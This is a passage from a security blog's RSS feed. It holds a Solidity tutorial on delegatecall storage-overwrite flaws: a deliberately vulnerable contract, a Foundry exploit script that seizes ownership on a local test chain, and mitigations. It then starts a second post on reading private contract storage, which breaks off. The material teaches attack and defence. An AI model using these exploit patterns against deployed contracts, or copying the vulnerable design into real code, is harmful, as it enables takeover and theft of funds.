7.  OpenZeppelin - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)</content:encoded><author>Ruben Santos</author></item><item><title>The Magic and Mayhem of delegatecall: A Deep Dive into Solidity’s Most Powerful Feature</title><link>https://www.kayssel.com/post/web3-10</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-10</guid><description>delegatecall is a powerful Solidity feature enabling one contract to execute another’s code while using its own storage. This flexibility allows for upgradable designs but poses risks like storage overwrites and exploits. Learn how it works, its pitfalls, and how to mitigate them effectively.</description><pubDate>Sun, 12 Jan 2025 11:24:09 GMT</pubDate><content:encoded># **Introduction: Unlocking the Secrets of `delegatecall`**

In the world of Solidity, few features offer as much power—and danger—as `delegatecall`. This low-level function is like a magical incantation, allowing one contract to execute the code of another as if it were its own. It’s the cornerstone of upgradable contracts and shared libraries, making it an invaluable tool for smart contract developers. But, as with any spell, using it without caution can lead to unintended and sometimes disastrous consequences.

In this article, we’ll dive deep into the workings of `delegatecall`, exploring its strengths and inherent risks. We’ll examine a fascinating example of a vulnerable contract—the **Magical Grimoire**—to see how a small design oversight can open the door to exploits. Along the way, we’ll also look at strategies to mitigate these vulnerabilities and ensure your contracts are both flexible and secure.

By the end, you’ll not only understand how `delegatecall` works but also how to wield it responsibly. Let’s start unraveling the mysteries of this powerful feature—and see why it’s both a gift and a curse for Solidity developers.

# **What is `delegatecall` in Solidity?**

If `delegatecall` were a spell in a wizard&apos;s grimoire, it’d be labeled &quot;Handle with Extreme Caution.&quot; It’s a low-level function in Solidity that allows one contract to temporarily borrow the code of another, running it as if it were its own. This makes `delegatecall` both incredibly powerful and dangerously easy to misuse—a true double-edged sword in the world of smart contracts.

## **How Does `delegatecall` Work?**

Imagine you’re in a self-driving car (the **calling contract**) that can’t navigate certain tricky routes by itself. To solve this, you hire a remote driver (the **target contract**) to control the car temporarily. The remote driver takes over, using your car&apos;s controls (your **storage**) to steer and accelerate. However, here’s the twist:

-   While the remote driver is in charge, they act as if they’re you. If someone asks, “Who’s driving?” they’ll say it’s you (because `msg.sender` and `msg.value` remain unchanged).
-   They don’t use their own car (storage). Instead, any adjustments they make—like changing the seat position or the radio station—are saved in your car.

This works great if the driver follows your instructions, but what if they’re not trustworthy? They might reprogram your GPS (modify your variables) or even disable your brakes (break your contract’s logic). The remote driver doesn’t have their own agenda (storage); everything they do happens in your car.

## **Why Use `delegatecall`?**

`delegatecall` is often used to create **upgradable contracts**. Imagine deploying a smart contract, only to discover a critical bug. In a traditional setup, you’d need to redeploy everything—what a hassle! With `delegatecall`, a proxy contract handles all interactions while delegating logic to a separate implementation contract. If you need to update your code, you simply replace the implementation contract without touching the proxy.

Some common use cases include:

-   **Proxy Contracts:** These allow you to swap out old logic for new without losing your contract&apos;s state.
-   **Libraries:** Shared functionality can live in a library, reducing redundancy across contracts.

### **The Risks of `delegatecall`**

As Uncle Ben said, &quot;With great power comes great responsibility.&quot; Here’s why `delegatecall` is not for the faint of heart:

1.  **Storage Overwrites:** The target contract manipulates your storage slots. If the storage layouts don’t match perfectly, chaos ensues—picture hiring a plumber to fix a leaky faucet, only to find your TV mounted in the bathroom.
2.  **Evil Contractors:** If the target contract is malicious or can be swapped out by an attacker, they can wreak havoc on your storage, stealing funds or breaking functionality.
3.  **Context Confusion:** The `msg.sender` and `msg.value` refer to the original caller, not the target contract. If access control relies on `msg.sender`, this can lead to accidental open doors for attackers.

Now that we’ve explored what `delegatecall` is and how it works, let’s dive into an example of a vulnerable contract to better understand the potential pitfalls and risks this powerful feature can introduce

# **The Magical Grimoire: A Contract of Enchantment**

Imagine a mystical book of spells, the **Grimoire**, governed by a master wizard who holds the power to unleash its magic. The contract is designed to manage spells dynamically, allowing the master wizard to cast new enchantments and set a unique **special spell** that only they can define.

At its core, the Grimoire maintains three key pieces of state:

1.  **MasterWizard**: The identity of the current master wizard, stored as a string, representing the address of the deploying account.
2.  **Spell**: The currently active spell that can be updated through external interaction.
3.  **SpecialSpell**: A unique and powerful spell that only the master wizard has the authority to define.

The Grimoire’s functionality revolves around its ability to call upon external libraries, like the **SpellLibrary**, to execute new spells. The magic happens through the `castSpell` function, which dynamically delegates calls to an external contract, allowing the Grimoire to expand its repertoire of spells.

Today, our mission is clear: to outwit the Grimoire&apos;s defenses and claim the title of Master Wizard, seizing control of its spells and unlocking the full extent of its magical power.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import &quot;forge-std/console.sol&quot;;

// The Magical Grimoire (vulnerable contract)
contract Grimoire {
    string public masterWizard; // The wizard controlling the grimoire (stored as a string)
    string public specialSpell; // A special spell only the master wizard can set
    string public spell; // The currently active spell

    constructor() {
        // Converts the deploying address to a string and assigns it as the masterWizard
        masterWizard = toString(msg.sender);
    }

    // Function to cast spells using an external library
    function castSpell(address spellLibrary, bytes memory spellData) public {
        (bool success, ) = spellLibrary.delegatecall(spellData);
        require(success, &quot;The spell failed!&quot;);
    }

    // Allows the master wizard to set a special spell
    function setSpecialSpell(string memory newSpell) public {
        require(
            compareStrings(masterWizard, toString(msg.sender)),
            &quot;Only the masterWizard can set special spells&quot;
        );
        specialSpell = newSpell;
    }

    // Helper: Converts an address to a string
    function toString(address account) internal pure returns (string memory) {
        bytes32 value = bytes32(uint256(uint160(account)));
        bytes memory alphabet = &quot;0123456789abcdef&quot;;

        bytes memory str = new bytes(42); // 42 characters: 2 for &quot;0x&quot; + 40 for the address
        str[0] = &quot;0&quot;;
        str[1] = &quot;x&quot;;
        for (uint256 i = 0; i &lt; 20; i++) {
            str[2 + i * 2] = alphabet[uint8(value[i + 12] &gt;&gt; 4)]; // Extract the first nibble
            str[3 + i * 2] = alphabet[uint8(value[i + 12] &amp; 0x0f)]; // Extract the second nibble
        }
        return string(str);
    }

    // Helper: Compares two strings for equality
    function compareStrings(
        string memory a,
        string memory b
    ) internal pure returns (bool) {
        return keccak256(abi.encodePacked(a)) == keccak256(abi.encodePacked(b));
    }
}

// Spell library (initially trusted)
contract SpellLibrary {
    string public spell; // Stores the active spell in the library

    // Sets a spell in the grimoire
    function setSpell(string memory newSpell) public {
        spell = newSpell;
    }
}

```
&lt;/details&gt;


Today, our mission is clear: to outwit the Grimoire&apos;s defenses and claim the title of Master Wizard, seizing control of its spells and unlocking the full extent of its magical power. But before we embark on this quest, let’s take a closer look at how the contract works in detail.

### **How It Works**

#### **Casting a Spell**

The Grimoire uses the `castSpell` function to interact with an external spell library. This function takes two inputs:

-   The address of the library contract.
-   Encoded data representing the spell to be cast.

The `delegatecall` keyword is used to execute the logic from the spell library within the context of the Grimoire, allowing the contract to dynamically expand its capabilities without requiring modifications to its own code.

```solidity
function castSpell(address spellLibrary, bytes memory spellData) public {
    (bool success, ) = spellLibrary.delegatecall(spellData);
    require(success, &quot;The spell failed!&quot;);
}

```

If the spell executes successfully, the Grimoire can update its state using the delegated logic.

#### **Master Wizard Privileges**

The master wizard, identified by the `masterWizard` variable, is granted exclusive rights to set a **special spell**. This function ensures that only the rightful master can define this unique magic:

```solidity
function setSpecialSpell(string memory newSpell) public {
    require(
        compareStrings(masterWizard, toString(msg.sender)),
        &quot;Only the masterWizard can set special spells&quot;
    );
    specialSpell = newSpell;
}

```

The comparison uses a helper function, `compareStrings`, to ensure the caller’s identity matches the stored master wizard string.

#### **Utility Functions**

Two utility functions bring convenience to the Grimoire’s design:

-   `toString`: Converts an Ethereum address into a string representation.
-   `compareStrings`: A simple yet effective function that compares two strings by hashing them with `keccak256`.

### **The SpellLibrary**

The **SpellLibrary** serves as the source of external logic that the Grimoire can invoke. It currently includes a single function, `setSpell`, which updates the spell stored in the Grimoire’s state:

```solidity
function setSpell(string memory newSpell) public {
    spell = newSpell;
}

```

This modular design ensures that the Grimoire can adopt new spells on the fly, making it a highly flexible system.

### **What Makes This Design Interesting?**

The Grimoire is a fascinating example of modular contract design:

-   It leverages external libraries to dynamically expand functionality.
-   It enforces access control for critical functions like `setSpecialSpell`.
-   It showcases how utility functions can handle non-trivial operations, such as converting addresses to strings.

In the next section, we’ll explore the potential consequences of this approach, shedding light on what can happen when powerful tools like `delegatecall` are not handled with sufficient care.

# **The Strategy: Becoming the Master Wizard**

To exploit the Grimoire contract and claim the title of Master Wizard, the key lies in understanding how `delegatecall` interacts with the contract&apos;s storage. As we’ve seen, `delegatecall` allows the Grimoire to execute functions from the SpellLibrary, but with the **Grimoire’s storage** as the context. This opens a door for anyone with sufficient knowledge of the storage layout to manipulate critical variables—like `masterWizard`.

Here’s the strategy in a nutshell:

1.  **Leverage `castSpell`:** The Grimoire’s `castSpell` function gives us the ability to call any function in the SpellLibrary. Since `delegatecall` uses the caller&apos;s storage, any modifications made by the library will directly affect the Grimoire’s state.
2.  **Target the Storage Slot:** In Solidity, [variables are stored in sequential slots](https://www.kayssel.com/post/web3-9/). The `masterWizard` variable resides in the first storage slot (slot 0), and this slot can be overwritten by the SpellLibrary’s logic.
3.  **Call a Function in SpellLibrary:** The `SpellLibrary` contract includes the `setSpell` function, which writes data into its `spell` variable. When called via `delegatecall`, this function will overwrite the Grimoire’s storage at slot 0, inadvertently modifying `masterWizard`.
4.  **Overwrite `masterWizard` with Your Address:** By encoding your address as a string and passing it to the `setSpell` function, you can replace the current `masterWizard` with yourself.

```mermaid
sequenceDiagram
    participant Attacker as Attacker
    participant Grimoire as Grimoire Contract
    participant SpellLibrary as SpellLibrary Contract
    participant Storage as Grimoire&apos;s Storage

    %% Step 1: Attacker initiates the attack
    Attacker-&gt;&gt;Grimoire: Call castSpell(spellLibrary, setSpellData)
    note right of Grimoire: castSpell uses delegatecall&lt;br&gt;to execute SpellLibrary&apos;s setSpell

    %% Step 2: Delegatecall transfers control
    Grimoire-&gt;&gt;SpellLibrary: delegatecall(setSpell)
    note right of SpellLibrary: Logic executes in Grimoire’s context&lt;br&gt;using Grimoire’s storage

    %% Step 3: SpellLibrary logic modifies storage
    SpellLibrary-&gt;&gt;Storage: Overwrite slot 0&lt;br&gt;(masterWizard) with attacker’s address
    note left of Storage: masterWizard replaced by attacker

    %% Step 4: Control is returned to the attacker
    Grimoire-&gt;&gt;Attacker: Return control&lt;br&gt;masterWizard now attacker
    note left of Attacker: Attacker becomes Master Wizard&lt;br&gt;and can cast special spells

```

In the next section, we’ll break down the exploit script step by step, illustrating exactly how to claim the title of Master Wizard and unleash your spells. Stay tuned—it’s time to wield the Grimoire’s magic like never before!

# **Simulating the Setup: Deploying the Grimoire and SpellLibrary**

Before diving into the exploit, let’s first ensure we have the magical battlefield ready. Remember to start **Anvil**, as we’ve done in previous chapters, to simulate the Ethereum environment locally. If you’re running a local environment and want to replicate the scenario, you’ll need to deploy both the **Grimoire** and the **SpellLibrary** contracts. Below is a deployment script written for Foundry, which simplifies this process.

```solidity
pragma solidity ^0.8.0;

// Deployment Script for Foundry
import &quot;forge-std/Script.sol&quot;;
import &quot;forge-std/console.sol&quot;;
import &quot;../src/Grimoire.sol&quot;;

contract DeployGrimoire is Script {
    function run() public {
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;)); // Begin broadcasting transactions

        // Deploy Grimoire
        Grimoire grimoire = new Grimoire();
        console.log(&quot;Grimoire deployed at:&quot;, address(grimoire));

        // Deploy SpellLibrary
        SpellLibrary spellLibrary = new SpellLibrary();
        console.log(&quot;SpellLibrary deployed at:&quot;, address(spellLibrary));

        vm.stopBroadcast(); // End broadcasting transactions
    }
}

```

#### **How It Works**

1.  The script uses Foundry’s `vm.startBroadcast` to simulate transactions signed with the admin&apos;s private key.
2.  The **Grimoire** is deployed first, and its address is logged.
3.  The **SpellLibrary** is then deployed, serving as the source of magic for our Grimoire.
4.  Both addresses are printed, so you can reference them in the exploit script.

```bash
forge script scripts/Exploit.s.sol

```

![](/content/images/2025/01/image-5.png)

Running the Deployment Script

Once deployed, you’re ready to proceed with the fun part—claiming the title of Master Wizard!

# **The Exploit: Becoming the Master Wizard**

With the battlefield set, let’s dive into the exploit. The objective is clear: use the Grimoire’s `delegatecall` to overwrite the `masterWizard` variable and seize control of the contract. Here’s the plan:

1.  **Log the Current MasterWizard:** Start by reading the `masterWizard` value, ensuring it’s still controlled by the original deployer.
2.  **Craft the Payload:** Encode a call to the `setSpell` function in the SpellLibrary, passing your address as a string.
3.  **Execute the Payload:** Use `castSpell` to delegate the call to the SpellLibrary, which will overwrite the `masterWizard` in the Grimoire.
4.  **Claim Your Powers:** Verify the new `masterWizard` value and demonstrate control by setting a special spell.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/Grimoire.sol&quot;;

contract GrimoireAttack is Script {
    Grimoire grimoire = Grimoire(0x5FbDB2315678afecb367f032d93F642f64180aa3); // Address of the Grimoire contract
    address spellLibrary = 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512; // Address of the SpellLibrary contract

    function run() external {
        // Start broadcasting the attacker&apos;s transactions
        vm.startBroadcast(vm.envUint(&quot;ATTACKER_KEY&quot;));

        // Log the current MasterWizard value
        console.log(&quot;Current Masterwizard:&quot;, grimoire.masterWizard());

        // Encode the call to `setSpell` in the SpellLibrary
        bytes memory setSpellData = abi.encodeWithSignature(
            &quot;setSpell(string)&quot;, 
            &quot;0x70997970c51812dc3a010c7d01b50e0d17dc79c8&quot; // Attacker&apos;s address as a string
        );

        // Execute the `castSpell` function to overwrite masterWizard
        grimoire.castSpell(spellLibrary, setSpellData);

        // Verify the new MasterWizard value
        console.log(&quot;Master after the attack: &quot;, grimoire.masterWizard());

        // Use your new powers to set a special spell
        grimoire.setSpecialSpell(&quot;Fire++&quot;);

        // Verify the modified special spell
        console.log(&quot;Special spell modify: &quot;, grimoire.specialSpell());

        // Stop broadcasting the attacker&apos;s transactions
        vm.stopBroadcast();
    }
}

```

### **Step-by-Step Explanation**

1.  **Logging the Current MasterWizard:** The script first prints the `masterWizard` to show it’s controlled by the original deployer.
2.  **Crafting the Payload:** The payload is encoded with the `abi.encodeWithSignature` function, targeting `setSpell` in the SpellLibrary. The key detail here is passing the attacker’s address as a string to overwrite the `masterWizard`.
3.  **Executing the Attack:** The `castSpell` function in Grimoire delegates the call to SpellLibrary’s `setSpell`. Since `delegatecall` uses the Grimoire’s storage, the value intended for `spell` in SpellLibrary instead overwrites `masterWizard` in Grimoire.
4.  **Verifying Control:** After executing the payload, the script prints the updated `masterWizard` value to confirm the attacker is now in control.
5.  **Flexing Your Powers:** With the title of Master Wizard secured, the attacker uses `setSpecialSpell` to set a custom spell, demonstrating complete control over the contract.

![](/content/images/2025/01/image-6.png)

Results After Running The Exploit

In the next section, we’ll explore how to mitigate vulnerabilities like this and ensure contracts remain safe from malicious wizards. Stay tuned—because every spell has a counterspell. 🧙‍♂️✨

# **Top 3 Solutions to Mitigate the Vulnerability**

`delegatecall` can be a powerful tool, but its misuse can turn your contract into a ticking time bomb. To prevent exploits like the one we’ve just seen, here are the top three solutions to mitigate this vulnerability:

## **Strictly Validate Trusted Contracts**

One of the main issues with the Grimoire contract is its blind trust in any contract passed to `castSpell`. By ensuring only pre-approved, secure libraries are used, you can eliminate the risk of malicious or unintended storage overwrites.

#### **Implementation**

-   Introduce a whitelist of trusted library addresses.
-   Validate the address before executing `delegatecall`.

```solidity
mapping(address =&gt; bool) private trustedLibraries;

function addLibrary(address libraryAddress) public onlyOwner {
    trustedLibraries[libraryAddress] = true;
}

function castSpell(address spellLibrary, bytes memory spellData) public {
    require(trustedLibraries[spellLibrary], &quot;Library not trusted&quot;);
    (bool success, ) = spellLibrary.delegatecall(spellData);
    require(success, &quot;The spell failed!&quot;);
}

```

#### **Benefit**

This approach ensures that only vetted contracts can execute logic on behalf of the Grimoire, significantly reducing the risk of malicious overwrites.

## **Avoid State-Dependent Delegate Calls**

Whenever possible, avoid using `delegatecall` for contracts that rely on shared storage. Instead, structure your system to separate state and logic, minimizing the potential for unintended consequences.

#### **Implementation**

Adopt an **upgradeable proxy pattern**, but isolate state variables in a dedicated storage contract. The proxy only forwards calls to an implementation contract without sharing storage directly.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```solidity
contract Proxy {
    address implementation; // Address of the logic contract

    function upgrade(address newImplementation) public onlyOwner {
        implementation = newImplementation;
    }

    fallback() external payable {
        (bool success, ) = implementation.delegatecall(msg.data);
        require(success, &quot;Delegatecall failed&quot;);
    }
}

contract Storage {
    string public masterWizard;
    string public spell;
    string public specialSpell;
}

```
&lt;/details&gt;


#### **Benefit**

This approach ensures storage remains consistent and prevents unexpected overwrites, as the logic and storage are decoupled.

## **Implement Slot-Level Access Controls**

If `delegatecall` is unavoidable, enforce strict access controls on critical storage slots. The Grimoire could have implemented a modifier to protect the `masterWizard` variable from unintended overwrites.

#### **Implementation**

Introduce a guard that ensures sensitive variables like `masterWizard` can only be updated through explicit functions, not indirectly via `delegatecall`.

```solidity
modifier onlyMasterWizard() {
    require(
        compareStrings(masterWizard, toString(msg.sender)),
        &quot;Access restricted to masterWizard&quot;
    );
    _;
}

function setMasterWizard(string memory newMasterWizard) public onlyOwner {
    masterWizard = newMasterWizard;
}

```

Additionally, critical slots should be locked down by restricting access to functions that directly modify them.

#### **Benefit**

This ensures that even if `delegatecall` is used, sensitive variables like `masterWizard` cannot be tampered with accidentally or maliciously.

### **Bonus Tip: Use Libraries Safely**

For reusable code, prefer Solidity’s native `library` keyword over external contracts. Libraries are inherently safer because they don’t have their own storage or rely on `delegatecall`.

&lt;details&gt;
&lt;summary&gt;Example:&lt;/summary&gt;

```solidity
library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }
}

```
&lt;/details&gt;


#### **Why This Works**

Using native libraries ensures that logic is executed safely within the calling contract’s context, without the risks associated with `delegatecall`.

### **Final Thoughts**

To summarize:

1.  Whitelist trusted libraries to prevent malicious code execution.
2.  Separate storage and logic with proxy patterns for safer upgrades.
3.  Lock down critical storage slots with explicit access controls.

By applying these strategies, you can transform your contract from a vulnerable grimoire into a fortress of well-protected magic. Remember, while `delegatecall` offers great flexibility, it also demands vigilance and robust design to ensure your spells don’t backfire.

# **Conclusions: The Perils and Power of `delegatecall`**

The story of the Magical Grimoire serves as a cautionary tale for developers wielding the incredible yet dangerous tool that is `delegatecall`. While its ability to enable upgradable contracts and reusable logic is undeniable, its misuse can open doors to catastrophic vulnerabilities.

Here’s what we’ve learned:

1.  **Flexibility Comes with Risks:** `delegatecall` operates directly on the calling contract’s storage, making it susceptible to unintended overwrites and malicious manipulation. The lack of built-in safeguards means developers must enforce strict controls on how it’s used.
2.  **Blind Trust Can Backfire:** In our example, trusting the SpellLibrary without restrictions allowed attackers to exploit the contract’s design, showcasing how a single oversight can compromise an entire system.
3.  **Mitigation is Possible:** By implementing strategies like trusted libraries, separating storage and logic, and locking down critical variables, developers can mitigate these risks while still benefiting from `delegatecall`.

Ultimately, `delegatecall` is not inherently bad—it’s a tool, and like any tool, it’s only as safe as the person using it. With proper precautions, you can harness its power to create dynamic, efficient, and upgradeable contracts without fear of leaving your project open to exploits.

# References

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Understanding `delegatecall` and Low-Level Functions. &quot;Solidity Documentation.&quot; Available at: https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call
-   **Trail of Bits** - Common Pitfalls with `delegatecall`. &quot;Trail of Bits Blog.&quot; Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
-   **Storage in Solidity** - Detailed Analysis of Solidity Storage Mechanics. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/en/latest/internals/layout\_in\_storage.html](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Anvil** - A Local Ethereum Development Node for Testing Smart Contracts. &quot;Anvil Documentation.&quot; Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)</content:encoded><author>Ruben Santos</author></item><item><title>Secrets in the Open: Unpacking Solidity Storage Vulnerabilities</title><link>https://www.kayssel.com/post/web3-9</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-9</guid><description>This chapter explores Solidity&apos;s storage vulnerabilities, showcasing how attackers exploit them and proposing solutions like hashing, off-chain storage, and dynamic secrets to secure smart contracts.</description><pubDate>Sun, 05 Jan 2025 11:33:40 GMT</pubDate><content:encoded># Introduction

In the magical land of blockchain, where smart contracts are the enchanted scrolls that power decentralized kingdoms, a question looms large: how do you keep a secret in a world where everyone can see everything? Enter the **SecretOfEryndor**, a fictional treasure chest with a clever twist—anyone who guesses the secret code unlocks 5 ETH. But here’s the catch: the chest is made of glass, and the code is scribbled inside for anyone curious enough to look.

Solidity’s storage system is like a spellbook written in invisible ink—visible to all who know how to read it. Even variables marked `private` are only private at the surface level. Beneath the transparency that makes blockchain trustworthy lies a paradox: the very openness that ensures decentralization also exposes secrets to potential exploits.

In this chapter, we’ll channel our inner adventurers and dive into the mechanics of Solidity’s storage. We’ll deploy the SecretOfEryndor contract, uncover how its vulnerabilities allow anyone to retrieve its hidden secret, and use Foundry’s scripting magic to execute an exploit step by step. Along the way, we’ll learn how to fortify contracts against prying eyes with techniques like hashing sensitive data, off-chain storage, and dynamic secrets. Ready to uncover the tricks hidden in the blockchain’s spellbook? Let’s begin the quest! 🗺️

# **Deep Dive into Solidity Storage Mechanics**

If Solidity storage were a physical space, it’d be a vast library of lockers—each one perfectly labeled and organized but with glass doors, so anyone can peek inside. This deterministic and efficient system ensures that smart contracts can quickly retrieve and update data. But it’s also the reason attackers know exactly where to look when they want to steal your secrets. Let’s grab a flashlight and explore these lockers more closely to see how they’re organized and what makes them vulnerable.

#### **The Slot System: A Perfectly Organized Locker Room**

In Solidity, storage is divided into 32-byte slots, each one numbered sequentially starting from zero. Every variable in your contract gets its own slot (or shares one, in the case of smaller variables). Here’s how Solidity assigns these lockers:

-   **Single Variables:** Larger data types like `uint256`, `address`, or `bool` are stored in their own slots.
-   **Packed Variables:** Smaller types like `uint8` or `bool` are crammed into a single slot like roommates in a dorm. Solidity is efficient that way, but this packing can cause issues if you’re not careful.

&lt;details&gt;
&lt;summary&gt;Take this example:&lt;/summary&gt;

```solidity
contract PackedStorage {
    uint8 public a;      // Stored in the first byte of slot 0
    uint8 public b;      // Stored in the second byte of slot 0
    uint256 public c;    // Stored in slot 1
}

```
&lt;/details&gt;


Here, `a` and `b` share slot `0`, snugly packed like Tetris blocks, while `c` stretches out in its own personal slot, slot `1`. This packing reduces costs but makes updates tricky—change one variable without care, and you might accidentally overwrite the other.

#### **Dynamic Data Types: The Wanderers of Storage**

Dynamic types like arrays, mappings, and strings are more adventurous. Instead of settling in a single slot, they use their base slot as a starting point and then branch out. Think of them as storing their metadata (like an index or a map) in one locker while their actual data goes to a separate, secret hideaway.

**Arrays:** Solidity stores the length of the array in its base slot. The actual data? That’s off on its own, starting at a hashed location derived from the base slot.

```solidity
contract ArrayExample {
    uint256[] public numbers; // Length stored in slot 0
}

```

In this case, `numbers.length` is in slot `0`, but the array’s elements live at `keccak256(0)` and beyond. If your array grows, it just keeps filling up lockers sequentially.

**Mappings:**  
Mappings use a similar hashing mechanism but include the key in the hash. For each key-value pair, Solidity computes the storage slot as `keccak256(abi.encodePacked(key, slot))`.

For `balances`, the value associated with an address is stored at a location derived from the hash of the address and the base slot. For instance, if the base slot is `0` and the key is an Ethereum address, the storage location is:

```solidity
keccak256(abi.encodePacked(address, 0))

```

```solidity
contract MappingExample {
    mapping(address =&gt; uint256) public balances; // Base slot at 0
}

```

#### **Strings and Bytes**

Strings and dynamic byte arrays have a dual personality. If the content is short (≤31 bytes), it’s stored directly in the slot along with its length. But for longer content, Solidity keeps the metadata in the slot and shuffles the actual data to a hashed location.

Here’s how a short string like `&quot;Hello&quot;` and a longer one like `&quot;A very long secret message&quot;` are stored:

```solidity
contract StringExample {
    string public message; // Slot 0 for metadata
}

```

-   `&quot;Hello&quot;` fits snugly into slot `0` with its length embedded.
-   `&quot;A very long secret message&quot;` keeps its metadata in slot `0`, but its content moves to `keccak256(0)`.

#### **The Glass Door Problem**

Now, here’s where things get practical. To query the storage of a contract and retrieve specific data, tools like **cast** make it straightforward. Even variables marked as `private` can be accessed by simply specifying the contract address and the storage slot you want to inspect:

```bash
cast storage &lt;CONTRACT_ADDRESS&gt; &lt;SLOT_INDEX&gt;

```

Now that we’ve unpacked the mechanics of Solidity’s storage, let’s put this knowledge into practice by examining a vulnerable contract 😋

# Vulnerable Smart Contract

The **SecretOfEryndor** contract is designed with a seemingly straightforward purpose: to reward users who correctly guess a secret code with 5 ETH. The contract owner retains control over its funds and can withdraw the remaining balance when needed.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract SecretOfEryndor {
    uint256 public creationTime; // Slot 0: A timestamp for when the contract was created
    string private secret; // Slot 1: The &quot;hidden&quot; secret code of the magical relic
    address public creator; // Slot 2: The address of the creator
    bool public isActive; // Slot 3: A flag to indicate if the contract is active
    uint8 public version; // Slot 3 (packed with `isActive`)

    // Constructor to initialize the contract
    constructor(string memory _secret) payable {
        require(
            msg.value &gt;= 5 ether,
            &quot;Contract must be funded with at least 5 ETH&quot;
        );
        creationTime = block.timestamp;
        secret = _secret;
        creator = msg.sender;
        isActive = true;
        version = 1;
    }

    // Function to guess the secret and claim 5 ETH if correct
    function guessSecret(string memory _guess) public {
        require(address(this).balance &gt;= 5 ether, &quot;Contract is out of funds&quot;);
        require(
            keccak256(abi.encodePacked(_guess)) ==
                keccak256(abi.encodePacked(secret)),
            &quot;Incorrect secret&quot;
        );

        // Send 5 ETH to the caller
        (bool success, ) = msg.sender.call{value: 5 ether}(&quot;&quot;);
        require(success, &quot;Transfer failed&quot;);
    }

    // Function to allow the creator to withdraw remaining funds
    function withdraw() public {
        require(msg.sender == creator, &quot;Only the creator can withdraw funds&quot;);
        require(address(this).balance &gt; 0, &quot;No funds to withdraw&quot;);

        (bool success, ) = creator.call{value: address(this).balance}(&quot;&quot;);
        require(success, &quot;Withdrawal failed&quot;);
    }

    // Function to deposit additional funds into the contract
    function fundContract() public payable {
        require(msg.value &gt; 0, &quot;Must send some ether&quot;);
    }
}

```
&lt;/details&gt;


The contract begins with five state variables, each playing a distinct role. The `creationTime` variable logs the timestamp of the contract’s deployment, providing a historical anchor for its initialization. The `secret` variable stores the private code that users must guess to claim the reward. The `creator` variable records the Ethereum address of the contract’s deployer, granting them administrative authority. Finally, the `isActive` and `version` variables manage the contract’s operational status and versioning, sharing the same storage slot for efficiency.

```solidity
uint256 public creationTime; // Slot 0: Timestamp of contract creation  
string private secret;       // Slot 1: The hidden secret  
address public creator;      // Slot 2: Address of the creator  
bool public isActive;        // Slot 3 (shared): Contract status flag  
uint8 public version;        // Slot 3 (shared): Contract version  

```

The constructor initializes these variables and ensures the contract is adequately funded. It requires a deposit of at least 5 ETH upon deployment, assigns the deployer’s address as the `creator`, sets the contract to active, and marks the version as one. This setup establishes the contract’s operational foundation.

```solidity
constructor(string memory _secret) payable {  
    require(msg.value &gt;= 5 ether, &quot;Contract must be funded with at least 5 ETH&quot;);  
    creationTime = block.timestamp;  
    secret = _secret;  
    creator = msg.sender;  
    isActive = true;  
    version = 1;  
}  

```

The `guessSecret` function is the contract’s centerpiece, allowing users to guess the secret code. If the guess is correct, the contract sends 5 ETH to the caller. The function first checks that the contract holds sufficient funds and then compares the hashed value of the submitted guess with the stored secret. This ensures that the comparison is resistant to direct string matching.

```solidity
function guessSecret(string memory _guess) public {  
    require(address(this).balance &gt;= 5 ether, &quot;Contract is out of funds&quot;);  
    require(  
        keccak256(abi.encodePacked(_guess)) == keccak256(abi.encodePacked(secret)),  
        &quot;Incorrect secret&quot;  
    );  

    (bool success, ) = msg.sender.call{value: 5 ether}(&quot;&quot;);  
    require(success, &quot;Transfer failed&quot;);  
}  

```

For fund management, the `withdraw` function allows the creator to withdraw all remaining Ether in the contract. This function ensures only the creator can execute it and that the contract has a positive balance before proceeding.

```solidity
function withdraw() public {  
    require(msg.sender == creator, &quot;Only the creator can withdraw funds&quot;);  
    require(address(this).balance &gt; 0, &quot;No funds to withdraw&quot;);  

    (bool success, ) = creator.call{value: address(this).balance}(&quot;&quot;);  
    require(success, &quot;Withdrawal failed&quot;);  
}  

```

Additionally, the `fundContract` function provides a way for anyone to deposit additional Ether into the contract, ensuring the reward pool can be replenished as needed.

```solidity
function fundContract() public payable {  
    require(msg.value &gt; 0, &quot;Must send some ether&quot;);  
}  

```

The contract’s storage layout organizes these variables predictably. The `creationTime` is stored in slot `0`, while the `secret` metadata resides in slot `1`. If the secret exceeds 31 bytes, its content is stored at a hashed location derived from slot `1`. The `creator` address is in slot `2`, and the `isActive` and `version` variables share slot `3`.

# **Deploying the Contract: Foundry Scripts in Action**

Today, we’ll take a different approach to deploying the vulnerable contract by using [Foundry’s powerful scripting capabilities.](https://book.getfoundry.sh/tutorials/solidity-scripting)

&lt;details&gt;
&lt;summary&gt;Deployment Script&lt;/summary&gt;

```solidity
